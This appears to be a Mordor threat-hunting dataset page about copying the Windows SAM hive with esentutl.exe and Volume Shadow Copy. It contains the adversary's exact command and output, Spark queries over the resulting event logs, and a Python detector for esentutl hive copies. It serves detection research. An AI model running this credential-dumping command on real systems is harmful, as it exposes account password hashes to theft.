SAM Copy via Esentutl VSS

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/19

Modification Date

2020/10/19

Tactics

['TA0006']

Techniques

['T1003.002']

Tags

['art.a90c2f4d-6726-444e-99d2-a00cd7c20480']

Dataset Description

This dataset represents adversaries copying the SAM hive with the esentutl.exe utility and the Volume Shadow Copy Service (VSS).

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author    Name    Link

Simulation Plan

Environment    Tool Type    Module
Lab VM         Manual       Cmd

Adversary View

Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\ProgramData\SAM

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...

Initiating COPY FILE mode...
    Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32
Destination File: C:\ProgramData\SAM

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

        Total bytes read                = 0x9000 (36864) (0 MB)
        Total bytes written             = 0x9000 (36864) (0 MB)


Operation completed successfully in 4.859 seconds.

C:\Users\wardog>

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/cmd_sam_copy_esentutl.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+------------+------------------------------------+-------+-----+
|Hostname    |Channel                             |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10     |245  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13     |208  |
|WORKSTATION5|Security                            |4799   |186  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|9      |117  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12     |77   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7      |55   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11     |4    |
|WORKSTATION5|Security                            |4658   |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|18     |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|5      |2    |
|WORKSTATION5|Security                            |4689   |2    |
|WORKSTATION5|Security                            |5156   |2    |
|WORKSTATION5|Security                            |5158   |2    |
|WORKSTATION5|Security                            |4904   |1    |
|WORKSTATION5|Security                            |4688   |1    |
|WORKSTATION5|Security                            |4905   |1    |
|WORKSTATION5|Security                            |4663   |1    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|1      |1    |
|WORKSTATION5|Security                            |4656   |1    |
|WORKSTATION5|System                              |104    |1    |
+------------+------------------------------------+-------+-----+
only showing top 20 rows
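As an added example (not part of the Mordor project or of this dataset's notebook), the same hunt expressed as plain Python over constructed JSON-lines records instead of the Spark view: it flags the EventID 1 / 4688 process-creation events that record esentutl.exe using /vss against a hive under \config\ and ignores ordinary esentutl usage. It generalises the single SAM case in the adversary view to the SECURITY and SYSTEM hives as well. Field names (Image, NewProcessName, CommandLine) are assumed to follow the Sysmon and Security 4688 schema, and the sample lines are constructed.

```python
import json
from typing import Iterable, List, Tuple

# Constructed sample events in the Mordor JSON-lines shape (one event per line).
# Field names follow Sysmon EventID 1 (Image/CommandLine) and Security EventID 4688
# (NewProcessName/CommandLine); the values are made up for this example.
SAMPLE_LOG = r"""
{"Hostname":"WORKSTATION5","Channel":"Microsoft-Windows-Sysmon/Operational","EventID":1,"Image":"C:\\Windows\\System32\\esentutl.exe","CommandLine":"esentutl.exe  /y /vss C:\\Windows/system32/config/SAM /d C:\\ProgramData\\SAM","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"Hostname":"WORKSTATION5","Channel":"Security","EventID":4688,"NewProcessName":"C:\\Windows\\System32\\esentutl.exe","CommandLine":"esentutl.exe  /y /vss C:\\Windows/system32/config/SAM /d C:\\ProgramData\\SAM","ParentProcessName":"C:\\Windows\\System32\\cmd.exe"}
{"Hostname":"WORKSTATION5","Channel":"Microsoft-Windows-Sysmon/Operational","EventID":1,"Image":"C:\\Windows\\System32\\esentutl.exe","CommandLine":"esentutl.exe /p C:\\Windows\\WindowsUpdate\\DataStore.edb","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"Hostname":"WORKSTATION5","Channel":"Microsoft-Windows-Sysmon/Operational","EventID":11,"Image":"C:\\Windows\\System32\\esentutl.exe","TargetFilename":"C:\\ProgramData\\SAM"}
not json at all
"""

# Registry hives under %SystemRoot%\System32\config that hold credential material.
HIVE_NAMES = ("sam", "security", "system")


def is_esentutl_vss_hive_copy(event: dict) -> bool:
    """True for a process-creation event where esentutl.exe uses /vss on a hive under \\config\\."""
    if str(event.get("EventID")) not in ("1", "4688"):
        return False
    image = (event.get("Image") or event.get("NewProcessName") or "").lower()
    if not image.endswith("\\esentutl.exe"):
        return False
    cmd = (event.get("CommandLine") or "").lower()
    if "/vss" not in cmd and "-vss" not in cmd:
        return False
    # esentutl accepts either separator in paths, so normalise before inspecting them.
    for token in cmd.replace("/", "\\").split():
        parts = token.strip('"').split("\\")
        if len(parts) >= 2 and parts[-2] == "config" and parts[-1] in HIVE_NAMES:
            return True
    return False


def find_hive_copies(lines: Iterable[str]) -> List[Tuple[str, int, str]]:
    """Parse JSON-lines events and return (Channel, EventID, CommandLine) for each match."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a malformed record should not abort the hunt
        if is_esentutl_vss_hive_copy(event):
            hits.append((event["Channel"], int(event["EventID"]), event["CommandLine"]))
    return hits
```

Run over the dataset's own records, the two matching events correspond to the single Sysmon EventID 1 and Security 4688 rows in the summary table above.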